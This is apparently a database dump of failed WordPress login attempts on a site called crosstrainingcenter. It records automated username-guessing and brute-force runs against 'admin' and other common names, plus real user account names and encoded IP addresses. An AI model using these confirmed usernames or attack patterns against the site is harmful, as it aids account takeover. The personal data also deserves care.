(99606, 1493220134.126870, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1977136493, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99607, 1493220136.607693, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1977136493, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99608, 1493220415.025531, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 609438027, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99609, 1493220416.588498, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 609438027, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99610, 1493220919.061253, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99611, 1493221933.638066, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99612, 1493222950.758087, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99613, 1493223994.869412, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99614, 1493225016.531627, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99615, 1493226048.229506, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99616, 1493227059.791461, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99617, 1493230809.791934, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99618, 1493230810.188788, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99619, 1493230810.519037, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99620, 1493230810.848155, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99621, 1493230811.390032, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99622, 1493230811.711376, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99623, 1493230812.034158, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99624, 1493230812.357411, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99625, 1493230812.679753, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99626, 1493230813.002956, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99627, 1493230813.326540, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99628, 1493230813.648694, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99629, 1493230813.973260, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99630, 1493230814.297041, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99631, 1493230814.628044, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99632, 1493230814.956300, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99633, 1493230815.278606, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99634, 1493230815.603118, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99635, 1493230815.931636, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99636, 1493233404.410571, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3256088714, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99637, 1493233405.687923, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3256088714, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99638, 1493233679.460087, 1, 'loginFailValidUsername', 'admin', 1, 1833643342, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99639, 1493234491.897822, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3173215047, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99640, 1493234493.445729, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3173215047, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99641, 1493235589.747620, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1460850312, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99642, 1493235591.283028, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1460850312, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99643, 1493238293.306733, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2266490841, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99644, 1493238294.434488, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2266490841, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99645, 1493240707.534135, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1442094233, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99646, 1493240708.605745, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1442094233, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99647, 1493242243.458116, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2548475614, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99648, 1493242244.382755, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2548475614, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99649, 1493242798.833785, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1651346743, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99650, 1493242800.052831, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1651346743, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99651, 1493243384.655988, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99652, 1493244130.202084, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 843509428, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99653, 1493244131.511984, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 843509428, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99654, 1493244412.128472, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99655, 1493245424.371331, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99656, 1493245537.912530, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 86750727, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99657, 1493246451.350585, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99658, 1493247481.236867, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99659, 1493247847.399627, 1, 'loginFailValidUsername', 'admin', 1, 1388450372, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99660, 1493248489.504719, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99661, 1493249519.075291, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99662, 1493250507.417030, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99663, 1493251530.168985, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99664, 1493252546.943807, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99665, 1493253264.221714, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3159244987, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99666, 1493253551.971125, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99667, 1493254576.757700, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99668, 1493255592.069883, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99669, 1493256620.396436, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99670, 1493256849.092075, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3142072067, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99671, 1493257627.168489, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99672, 1493258458.732103, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1023829342, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99673, 1493258460.074197, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1023829342, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99674, 1493258653.878770, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99675, 1493259279.605399, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1147995635, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99676, 1493259663.748998, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99677, 1493260697.024932, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99678, 1493260800.772779, 1, 'loginFailValidUsername', 'admin', 1, 1578576348, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99679, 1493261050.215890, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892041857, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99680, 1493261705.963004, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99681, 1493264207.656760, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3398003026, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99682, 1493264209.316606, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3398003026, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99683, 1493269667.692713, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2391196847, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99684, 1493272672.255283, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1286823711, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99685, 1493272673.416342, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1286823711, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99686, 1493272675.204620, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 88326778, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99687, 1493272676.113215, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 88326778, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99688, 1493274957.793472, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3398335459, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99689, 1493274959.100546, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3398335459, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99690, 1493275297.286588, 1, 'loginFailValidUsername', 'admin', 1, 1590206329, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99691, 1493279628.543055, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99692, 1493280611.841750, 1, 'loginFailValidUsername', 'julie', 2, 3560927088, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99693, 1493280612.674450, 1, 'loginFailValidUsername', 'julie', 2, 3560927088, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99694, 1493280613.492637, 1, 'loginFailInvalidUsername', 'julie pierrard', 0, 3560927088, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99695, 1493280614.469209, 1, 'loginFailValidUsername', 'pablo', 3, 3560927088, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99696, 1493280615.478864, 1, 'loginFailValidUsername', 'admin', 1, 3560927088, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99697, 1493280638.248527, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99698, 1493281689.007268, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99699, 1493282701.478077, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99700, 1493283217.973130, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3651510709, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99701, 1493283580.678715, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1317189474, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99702, 1493283735.091198, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99703, 1493284766.483443, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99704, 1493285810.650499, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99705, 1493286229.784375, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1549149366, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99706, 1493286230.857594, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1549149366, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99707, 1493286832.315981, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99708, 1493287255.561397, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 698274019, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99709, 1493287257.210485, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 698274019, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99710, 1493287859.331555, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99711, 1493288917.169716, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99712, 1493289292.969535, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3114053210, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99713, 1493289294.850834, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3114053210, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99714, 1493289657.720297, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1335843221, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99715, 1493289658.752834, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1335843221, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99716, 1493289682.866847, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 778260109, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99717, 1493289683.909026, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 778260109, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99718, 1493289961.273468, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99719, 1493291001.818655, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99720, 1493291550.057672, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3754777714, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99721, 1493291552.185781, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3754777714, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99722, 1493292032.228695, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99723, 1493292443.920147, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1430890718, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99724, 1493292445.192330, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1430890718, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99725, 1493293081.796773, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99726, 1493294117.822114, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99727, 1493294384.285111, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3588843288, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99728, 1493294385.440912, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3588843288, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99729, 1493294830.160849, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1823113940, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99730, 1493294831.257940, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1823113940, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99731, 1493295141.399084, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99732, 1493295637.694101, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3033986906, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99733, 1493295639.193551, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3033986906, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99734, 1493295688.417935, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 977552699, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99735, 1493295689.946462, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 977552699, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99736, 1493296040.613480, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1449745144, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99737, 1493296096.268139, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2981339500, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99738, 1493296097.666988, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2981339500, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99739, 1493296191.059987, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99740, 1493297211.337588, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99741, 1493298260.877955, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99742, 1493299504.203745, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2536339395, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99743, 1493299505.450241, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2536339395, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99744, 1493300070.973477, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 694570146, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99745, 1493300083.073421, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 694570146, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99746, 1493300928.095736, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1598980920, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99747, 1493300929.370467, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1598980920, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99748, 1493302076.785915, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1887828803, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99749, 1493303793.913824, 1, 'loginFailValidUsername', 'admin', 1, 2960954126, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99750, 1493304648.803691, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1768073243, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99751, 1493304649.900003, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1768073243, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99752, 1493305620.622049, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1396104586, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
